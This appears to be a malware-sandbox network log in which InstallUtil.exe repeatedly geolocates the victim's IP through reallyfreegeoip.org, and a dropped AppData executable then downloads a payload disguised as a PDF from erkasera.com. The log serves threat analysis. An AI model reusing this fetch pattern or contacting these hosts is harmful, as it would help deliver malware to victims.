2024-11-05 10:04:52 UTC	138	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode>
2024-11-05 10:04:52 UTC	221	IN	Data Raw: 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: <RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49702	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:53 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-05 10:04:53 UTC	1217	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:53 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21771 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kWb9w%2BMjjh5LxglCafH8oLuFgqDj3FjpXhAcCJr2mKLmD5eYTobkHnIACZ569w7zKYyZ4mFoS5I6ldapkpnryKiSrCqF43RlCJxM%2F3GVu87lpidQXmixur7jViyeJqY%2FMZfKBfxN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05b02d506b5f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2531468&cwnd=248&unsent_bytes=0&cid=be6e30186d63b308&ts=145&x=0"
2024-11-05 10:04:53 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-05 10:04:53 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49704	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:54 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:04:54 UTC	1225	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:54 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21772 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOL5nMr%2FLQlNQyO%2Byl14DYOMBW3tEvxigN1n5vFZjsulzbWDjwN2%2FiYh4h5TDncVHRsoIBHFIkdmbFqtsfuKupddw%2Bh62mgKasODFZHQiCVe2TdHHcc0%2FXx%2FXMFLDoGtwGcx%2FgDj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05ba6a24466e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1849&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1552815&cwnd=243&unsent_bytes=0&cid=85b634032123fea3&ts=150&x=0"
2024-11-05 10:04:54 UTC	144	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Regi
2024-11-05 10:04:54 UTC	215	IN	Data Raw: 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: onName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49707	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:56 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-05 10:04:56 UTC	1223	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:56 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21774 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZaDzU85RVpVNbmD4QbLtd17GEd%2Bm8a33TvRE8S%2FtB%2B%2BFneydt1COebUj6d7vaimI%2B9swT5G8KVK8J%2Fd5doDTFFi8lrRhqokMGZAQsGFtXleqLvi8FoUkiU5EryvxAjzOaF2YcSO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05c4bfde485f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1243&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2437710&cwnd=251&unsent_bytes=0&cid=fa54f120b2beb439&ts=146&x=0"
2024-11-05 10:04:56 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-05 10:04:56 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49714	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:58 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:04:58 UTC	1219	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:58 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21776 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WJ6CVHcWWjm5Jf1PCofSGJBmwHXr%2FZqFxrIUlsqqwnzhPO3lf1MD6BtmSXBrERIpoU%2BhoW73BhIT%2Fc97Z7fWtb5xNg04Y4wr5Cft2j9393mj5ElVjF8lx3eZyo%2BDABaXV5qgi2j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05cef9b9285d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2020935&cwnd=251&unsent_bytes=0&cid=d58d4e6b4591adc3&ts=147&x=0"
2024-11-05 10:04:58 UTC	150	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-05 10:04:58 UTC	209	IN	Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49726	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:04:59 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-05 10:04:59 UTC	1223	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:04:59 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21777 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZGRAV7o13HuSE2u7fOcQiRCpGRVfmGuJwOL%2BnFLuzog6F%2BQWMqzg3on4a9AdA7a3rCLW9LE%2FE%2BG7mt5tx62%2BHqyOLPgRDsjM5QYShZo0dsN%2FyE5yJyk7EPePyRR8wpuneLlJdpjV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05d92f8a479a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1051&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2747628&cwnd=252&unsent_bytes=0&cid=869fb6bdf517c472&ts=147&x=0"
2024-11-05 10:04:59 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-05 10:04:59 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49739	188.114.96.3	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:01 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-05 10:05:01 UTC	1212	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:01 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21779 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQNgtSQEIYTtDNVl1jM78mqDFGZzoOprrEUma8uu7qZ2uwq3tw6nWSW8RVavbJcQp7eOKTwBarQthQK969jjxRsNA1SmoXN9%2FhmPzFtaCp194X4PwFh1c2E2TX1qmlHIsX6vmL9d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc05e39f72b78f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2083&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1363465&cwnd=43&unsent_bytes=0&cid=e900698601761afd&ts=149&x=0"
2024-11-05 10:05:01 UTC	157	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas<
2024-11-05 10:05:01 UTC	202	IN	Data Raw: 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: /RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49755	188.132.193.46	443	8144	C:\Users\user\AppData\Roaming\Keywords.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:04 UTC	84	OUT	GET /ruurew/Gksrgyexmxn.pdf HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-11-05 10:05:04 UTC	198	IN	HTTP/1.1 200 OK Connection: close content-type: application/pdf last-modified: Tue, 05 Nov 2024 00:39:17 GMT accept-ranges: bytes content-length: 951312 date: Tue, 05 Nov 2024 10:04:38 GMT
2024-11-05 10:05:04 UTC	16384	IN	Data Raw: fe 72 c9 0f 46 22 cc 8e 58 8a d2 b6 14 6c 91 27 d2 86 e0 48 35 df 70 cd 14 d5 99 39 5c 3f 21 a9 f7 22 be 5d a0 0c 22 59 6e d0 dc 0f 2e 30 8d ea b6 06 51 6e 0e f4 7c 6b f2 53 ef 62 a5 0c 3b bd d6 9f 2f 9e 33 8c 0b 6e 50 ec ef a0 09 44 be 4d 6e dd 1b 00 d7 ab db 97 cc 02 41 4f 52 c3 f8 82 33 7f da ea 31 fe 05 10 7e 9c 16 2e aa 39 9c 28 f7 8a a5 10 4e ac 65 62 fb e6 09 c3 ed 71 99 90 b1 bf 5a 38 39 31 c7 ff 4e 76 fa 6a 58 f3 e3 e7 72 9a 5f 35 8c 7e f4 9e a2 66 5f 65 d2 ef f9 e4 b0 d0 91 a9 16 8b 11 73 a3 0c 1d ec 1a d3 eb cc 39 c3 44 e5 86 ee 1b 6e 52 fc 53 95 50 12 4b 6c 1c ca 9e 2e 28 60 ef 00 6f ed fe 73 9e 4c c2 fa ca 41 27 20 60 97 7e b3 6a 75 49 56 77 c5 20 30 46 ba 1f bb 5a 11 f4 ac 3c 03 75 37 bc 9d eb c1 50 fd 16 18 de 49 51 83 87 a0 3e f7 2b 83 9e Data Ascii: rF"Xl'H5p9\?!"]"Yn.0Qn\|kSb;/3nPDMnAOR31~.9(NebqZ891NvjXr_5~f_es9DnRSPKl.(`osLA' `~juIVw 0FZ<u7PIQ>+
